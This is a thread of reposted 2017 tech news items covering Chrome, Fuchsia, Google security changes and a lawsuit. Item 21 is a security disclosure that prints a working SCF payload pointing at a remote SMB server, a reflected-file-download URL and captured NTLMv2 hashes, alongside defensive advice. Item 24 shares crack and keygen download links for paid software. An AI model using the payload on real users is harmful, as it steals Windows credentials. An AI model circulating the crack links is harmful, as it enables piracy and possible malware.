  18. Chrome Home is an experimental feature of Chrome for Android that makes major changes to the mobile browser when enabled. Chrome has the reputation of being a very stable browser, one that is kept more or less like it is in regards to the user interface and functionality. While that is certainly the case, Google has worked on modifications to the user interface of the browser all the time in the past. Most of these experiments are not disclosed to users of the browser, while some are launched as experiments to get feedback on them before the decision is made to roll them out to all users, or throw them in the garbage bin. Chrome Home Chrome Home is such a new feature. Unlike other interface modifications or changes in the past, it is a major one. It changes the browser's New Tab Page, but also the main toolbar of Chrome, as it moves it from the top to the bottom of the browser screen. Note that the new feature is only available in beta releases of Chrome right now (Chrome Beta, Chrome Canary, Chrome Dev) First, lets take a look at how you can enable the new Chrome Home feature: Open Google Chrome Dev on your Android device (may also work with Canary and Beta already). Type chrome://flags in the browser's address bar and tap on the submit button to load the address. Locate Chrome Home on the page. The easiest way to do that is to tap on menu, select Find on Page, and enter Chrome Home to jump to the flag right away. Tap on the default menu underneath the Chrome Home flag, and set it to enabled once the selection menu comes up. You are asked to restart Google Chrome at this point to apply the change. Note that there are two additional flags right now that you can enable: Chrome Home Expand Button -- which adds a button to Chrome Home that lets you expand the interface when you tap on it (you need to swipe otherwise). Chrome Home NTP Redesign -- enables the NTP (New Tab Page) redesign for Chrome Home. Chrome Home moves the browser's address bar to the bottom of the screen. This is a major move, considering that most browsers display the address bar at the top. Even if you don't mind the change, it is likely that you will need to grow accustomed to the new position, and that it will feel out of place in the beginning. The move of the address bar is the most visible, but not the only change that Chrome Home introduces. You can swipe up using the toolbar as your base for the motion to display the new tab page interface on the screen. This interface lists top sites (you visited) or popular sites, news, and links to Home, Downloads, Bookmarks and the browsing history. Tip: You can disable the popular sites by setting the flag "show popular sites on the New Tab Page" on chrome://flags to disabled. You can use the swipe motion to increase or decrease the size of the interface. Downloads, bookmarks and history display those directly; useful to manage downloads, open bookmarks, or manage the browsing history of Chrome for Android. (via Stadt Bremerhaven) Article source
  19. Tavis Ormandy, the most famous of Google's security experts, has ported Windows Defender DLLs to Linux with the aid of a new tool he released today on GitHub. The new tool is named loadlibrary, and Ormandy says he created it for the sole purpose of helping security researchers, not necessarily the Linux user community. Loadlibrary is for pen-testers and security researchers Loadlibrary's sole purpose is to allow researchers to run and load Windows DLLs on Linux together with specialized pen-testing tools called fuzz tools, or fuzzers. These tools perform an automated operation called fuzzing, which relies on feeding a software application with random data and analyzing the output for abnormalities. Google's security experts are big fans of fuzzing when searching for undocumented vulnerabilities. In the past years, Google has developed two of the most popular fuzzing tools around, namely OSS-Fuzz and syzkaller. Syzkaller is how Google engineers discovered three major bugs in the Linux kernel [1, 2, 3]. Two of these bugs had survived in the kernel code for 9 and 11 years, respectively, showing a fuzzing tool's ability to uncover bugs that humans couldn't spot during manual code reviews. Ormandy used tool to find "crazy bad" Windows flaw Earlier this month, Ormandy also used fuzzing to find a vulnerability in the Microsoft Malware Protection Engine, which he later described as "crazy bad" and "the worst Windows remote code exec in recent memory." The loadlibrary project is one of the tools Ormandy used for discovering that flaw. The default loadlibrary package Ormandy released today on GitHub includes a demo in which the researcher ported Windows Defender on Linux. More precisely, Ormandy ported the Microsoft Malware Protection Engine (MsMpEng), the security service installed by default on Windows 8, 8.1, 10, Windows Server 2016 operating systems. Of the MsMpEng package, Ormandy ported the Mpengine component, responsible for scanning and analyzing malware. Loadlibrary is not a Wine replacement Despite his demo, the researcher says loud and clear that his tool is not intended as a way to run Windows apps on Linux. "This project does not replace Wine or Winelib," Ormandy says, "Winelib is used to port Windows C++ projects to Linux, and Wine is intended to run full Windows applications. This project is intended to allow native Linux code to load simple Windows DLLs." Nonetheless, while Linux desktop users can't use loadlibrary in any way, the tool is attractive to app developers, who can use it to load DLL data into Linux apps without having to port the entire Windows app along the way. Article source
  20. Google Fuchsia UI Google’s I/O 2017 event offered the tech giant the perfect opportunity to announce projects that the company has been working on and the direction it intends to take in terms of AI and VR technology, among others. Earlier this month, images revealing a project that Google has been working on surfaced online. Details about Google Fuchsia first surfaced last year, but the recent report showed the OS’s System UI and revealed some features that it could incorporate. Android Police reported that during the Android Fireside Chat, Google’s VP of engineering for Android, Dave Burke was asked about one of the most exciting projects at Google, Fuchsia OS. The engineer said that the experimental project is at an early-stage and it’s one of the many projects that Google is working on. Fuchsia won’t replace Android or Chrome OS What sets Fuchsia apart is its open source nature, which allows developers to see the code and bring contributions to it. David Burke stated “How do you spell Fuchsia? Fuchsia is a early-stage experimental project. We, you know, we actually have lots of cool early projects at Google. I think what’s interesting here is it’s open source, so people can see it and comment on it. Like lots of early stage projects it’s gonna probably pivot and morph. There’s some really smart people on it, people we’ve worked with who are great. And so it’s kind of exciting to see what happens. But it’s definitely a different sort of independent project to android. And yeah, that’s basically it.” It’s worth noting that Google’s Fuchsia project isn’t being developed alongside Android, which means that Google doesn’t have any intention to replace Android OS or Chrome OS with this new project. Still, that doesn’t mean that the situation won’t change in the future, as Fuchsia OS gradually takes shape and becomes a stable operating system. Since it’s at the early stages of development, there’s still the possibility that it could be scraped to make way for other projects by Google. At this point, time will tell if Fuchsia OS will eventually progress to become a full-fledged OS. Source
  21. Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the Internet was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This article describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it. The problem With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one. From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that? Windows Explorer Shell Command File or SCF (.scf) is a lesser known file type going back as far as Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP where it was primarily used as a Show Desktop shortcut. It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location. Taken as an example, this is how Show Desktop SCF file contents looked like: [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet but does not give the same treatment to SCF files. SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example: [Shell] IconFile=\\170.170.170.170\icon Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon “. The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following: [*] SMB Captured - 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e0000000002000000000000 0000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06f cdd201ccf26d91cd9e326e00000000020000000000000000000000 The above example shows a disclosure of victim’s username, domain and NTLMv2 password hash. It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files. Impact Password disclosure For users in Active Directory domains (corporate, government and other networks), password disclosure can have various impacts ranging from escalating internal network breaches to accessing externally available NTLM-enabled services and breaches based on password reuse. For Windows 8/10 users that are using a Microsoft Account (MSA) instead of a local account, the password disclosure impacts all the Microsoft services that are integrated with the MSA SSO such as OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and others. The common problem of password reuse can lead to more account breaches unrelated to MSA. Regarding password cracking feasibility, this improved greatly in the past few years with GPU-based cracking. NetNTLMv2 hashcat benchmark for a single Nvidia GTX 1080 card is around 1600 MH/s. That’s 1.6 billion hashes per second. For an 8-character password, GPU rigs of 4 such cards can go through an entire keyspace of upper/lower alphanumeric + most commonly used special characters (!@#$%&) in less than a day. With hundreds of millions leaked passwords resulted from several breaches in the past years (LinkedIn, Myspace), wordlist rule-based cracking can produce surprising results against complex passwords with more entropy. The situation is even worse for Windows XP systems and networks where backwards compatibility with NTLMv1 has been explicitly enabled. In those cases, a downgrade attack can be performed forcing the client to authenticate with a weaker hash/protocol (such as NTLMv1 or even LM) instead of NTLMv2. This enables the attacker to capture a hash which can be cracked many times faster than NTLMv2 – in the case of LM often within seconds using precomputed tables for reversing cryptographic hash functions (“Rainbow tables”). SMB relay attacks Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password. This was successfully demonstrated by Jonathan Brossard at the Black Hat security conference. Under certain conditions (external exposure) an attacker may even be able to relay credentials to a domain controller on the victim’s network and essentially get an internal access to the network. Antivirus Handling of SCF Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous. All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of IconFile parameter considering there are no legitimate uses of SCF with remote icon locations. Introducing new attack vectors Although using social engineering to entice the victim to visit the attacker’s website as well as open redirection and cross site scripting vulnerabilities on trusted websites are the most common attack vectors to deliver malicious files, for this attack I would like to add an often disregarded and lesser known vulnerability that could serve the same purpose, hoping it would bring attention to its impact. Reflected file download First described by Oren Hafif, the Reflected File Download vulnerability occurs when a specially crafted user input is reflected in the website response and downloaded by the user’s browser when the certain conditions are met. It was initially used as an attack vector to trick the user into running malicious code (usually from a Windows batch file), based on the user’s trust in the vulnerable domain. Since SCF format is rather simple and our attack requires only two lines that can be preceded and followed by (almost) anything, it creates perfect conditions to be used with RFD. RFD is usually aimed at RESTful API endpoints as they often use permissive URL mapping, which allows for setting the extension of the file in the URL path. Chrome will not download most of typical API response content types directly so these would have to be forced through a download attribute in a href=… link tags. However, there are exceptions. Chrome uses MIME-sniffing with text/plain content type and if the response contains a non-printable character it will be downloaded as a file directly and automatically unless the “nosniff” directive is set. This can be demonstrated on World Bank API, using the following URL: http://api.worldbank.org/v2/country/indicator/iwantyourhash.scf?prefix= %0A[Shell]%0AIconFile=\\170.170.170.170\test%0Alol=%0B&format=jsonp Due to the non-printable character %0B Chrome will download the response as iwantyourhash.scf file. The moment the download directory containing the file is opened Windows will try to authenticate to the remote SMB server, disclosing the victim’s authentication hashes. Due to the non-printable character %0B Chrome will download the response as iwantyourhash.scf file. The moment the download directory containing the file is opened Windows will try to authenticate to the remote SMB server, disclosing the victim’s authentication hashes. Recommendations In order to disable automatic downloads in Google Chrome, the following changes should be made: Settings -> Show advanced settings -> Check the Ask where to save each file before downloading option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files. As SCF files still pose a threat the measures that need to be taken depend on affected users network environment and range from simple host level hardening and configuring perimeter firewall rules to applying additional security measures such as SMB packet signing and Extended Protection. With the first two the goal is to prevent SMB traffic from leaving the corporate environment by blocking ports that can be used to initiate a connection with a potentially malicious Internet-based SMB server. When possible, SMB traffic should always be restricted to private networks. Conclusion Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources. We hope that the Google Chrome browser will be updated to address this flaw in the near future. Article source
  22. Google takes steps to increase security Following the famous Gmail phishing attack from just a few days ago, Google has decided to make it more difficult for apps to get access to people's data. The company announced that new applications that request access to user data will, from now on, face more scrutiny. Some of these apps may even "qualify" for a manual review due to Google's enhanced risk assessment. “Until the review is complete, users will not be able to approve the data permissions, and we will display an error message instead of the permissions consent page. You can request a review during the testing phase in order to open the app to the public. We will try to process those reviews in 3-7 business days. In the future, we will enable review requests during the registration phase as well,” Google informs developers. Developers will continue to use their apps for testing purposes even before they get approved. They'll need to log in with an account registered as owner or editor of the project in the Google API Console. From there, they'll be able to add more testers and to start the review process. To add an extra layer of security, Google has updated the app identity guidelines. In them, it states that apps must not mislead users, which also indicates that they need to have unique names and not copy other apps, which is something that has happened countless times already. “These changes may add some friction and require more time before you are able to publish your web application, so we recommend that you plan your work accordingly,” Google says. Multiple changes to increase security The changes come as a result of the attack that took place a few weeks ago. Gmail users started receiving phishing emails pretending to be from someone they know who was looking to share content with them on Google Docs. A link took people to a login page where a fake Google Docs app requested permission to people's contacts and emails. The attack was stopped within an hour and the company said that less than 0.1% of Gmail users were even impacted by the incident. The company has already tighten OAuth rules, it's anti-spam systems, and more. Source
  23. Google was hit by a phishing attack last week, as attackers used Google’s web app platform to publish an app seemingly named as ‘Google Docs’, tricking users into thinking that it’s the legitimate Google service. It took a mere three hours for Google to blacklist the offending web app; the next day, Google rolled out an update for Gmail to better warn users about phishing links. Today, the Mountain View giant has announced an update to its approach with regards to the publishing process for web apps that request user data. The company notes that while its API’s user data policy states that “apps must not mislead users” and that their names “should be unique to [the] application and should not copy others”, the process of enforcing this policy have been lackluster. To fix that, Google is updating its web app publishing process, its risk assessment systems, as well as the user-facing consent page for apps. As far as the average user is concerned – nothing changes. But, developers might notice delays in publishing or modifying their web apps. As an example, subject to how the new risk assessment process feels about a web app, some web apps might require a manual review by Google before publishing publicly. Developers will have to manually request said review during an app’s testing phase, and Google may take up to 7 days to give its nod; until approved, the app will only work for the owner, editor, and additional testers. The average user will not be able to provide permission to use their data until an app has been approved. These changes are sure to help prevent a repeat of such phishing attacks. Google didn’t state if any more changes were coming to the user-facing consent page, but hopefully, a change to highlight the app publisher’s name more prominently is in the works. Source
  24. Gmail Notifier Pro - the program to alert you when new mail in service Gmail. However, Gmail Notifier is more than just a tool for warning, it can be used to check the mail, as well as create new messages from the desktop interface, the choice of the type of account (Google Gmail Atom, Google Gmail IMAP, Google Calendar, subscribe to a feed and Google Reader ) and much more. You can also keep track of multiple accounts from Gmail. After installing the software, open the Options and set the account Gmail. You can use the method of both Atom and IMAP. After setting, you can see all the messages in the main window and a separate window allows you to view the contents of your email. Every time when a new e-mail message, you will receive a notification with the desktop will look pretty cool. The program supports themes that can be customized from the window Options. Set up a notifier so you more like it. When you need to create a new message, just click on the Compose New Email option in the system tray. Features: Gmail Notifier Pro provides many easy-to-use and settings. Checking multiple Gmail accounts for new mail - including Google Apps accounts. Displays pop-up notifications and plays audio message alerting the user when new mail arrives. A complete overview of all unread messages in all your inboxes. Support Atom and IMAP protocols. Allows you to create and respond to email without opening a browser. Integration with Google Contacts. Website: http://www.gmailnotifier.se Release date: 14 May 2017 OS: Windows XP / Vista / 7 / 8 /10 Language: ML Changelog: Download setup Download portable Installer + Fix: Site: https://cloud.mail.ru Sharecode: /public/5Gu2/bP9EQYCMh Installer + Fix + Portable: Note: Just copy the link and sharecode together and then press enter. You need to enter the credentials as mentioned in main post. The d/w starts immediately. Site: http://95.141.193.17 Sharecode: /noload2/files/061/Gmail.Notifier.rar Usrname: rsload.net Pwd: rsload.net Noy medicine - shared by Siddharta N.B. - shared by Siddharta If you're looking for ConfigDat.xml >>> open run (Windows logo + R) and type: %appdata%\GmailNotifierPro Then replace with keygen registration <RegisteredUser><Name>XXXXX YYYYYY</Name><EMail>[email protected]</EMail><RegistrationCode>4ACXXXXXXXXXXX3EC1</RegistrationCode></RegisteredUser> Note: The xxxx (yyyyy)is personal data or names My Crack Gmail Notifier Pro 5.3.5 - by bb2018: Site: https://www.upload.ee Sharecode[?]: /files/7008428/Crack-Gmail_Notifier_Pro_5.3.5_.rar.html
  25. Google, Facebook and Twitter sued for San Bernardino terrorist attack Social media companies Facebook and Twitter, as well as Google, are being sued for allegedly enabling ISIS to spread its extremist messages ahead of the San Bernardino attack of 2015. The families of three victims are behind the lawsuit, which claims that these companies aided and abetted the terrorist attacks and are, therefore, liable for wrongful death, reports the Los Angeles Times. "Even if Farook and Malik had never been directly in contact with ISIS, ISIS' use of social media directly influenced their actions on the day of the San Bernadino massacre," reads the lawsuit, referring to Syed Rizwan Farook and Tashfeen Malik. The two were known ISIS supporters and pledged their allegiance to the group on Facebook ahead of the attack. The main idea behind the lawsuit is that because Facebook, Twitter and Google's YouTube allow everyone, including ISIS members, to post on their platforms, they are somehow at fault for indoctrinating the couple. A flawed and dangerous idea This seems like the type of lawsuit that will get thrown out quite quickly, mainly because there are billions of people using social media. Facebook is heading towards the 2 billion milestone, Twitter has over 315 million monthly users and Google is probably used by most people with an Internet access, except for those where other similar tools are available and locally promoted, like China. YouTube, for its part, doesn't necesarily have a number of users who view content, but it does release the number of hours watched by users every month - 3.25 billion. Among these billions of people who use three of some of the most popular tools on the Internet, there are some bad seeds, of course, including ISIS members and other extremists. Most of these people are aware of ISIS and haven't gone to the dark side just because they exist and promote their content online. And for the record, their content does get removed and their accounts shut down. The companies, logically, deny liability and say that it's a tenuous and potentially very dangerous chain of blame that led to them being sued. Basically, any social network can be blamed for terrorism around the world simply because the attackers may have had the smallest connection to the platform. That idea is deeply flawed. Source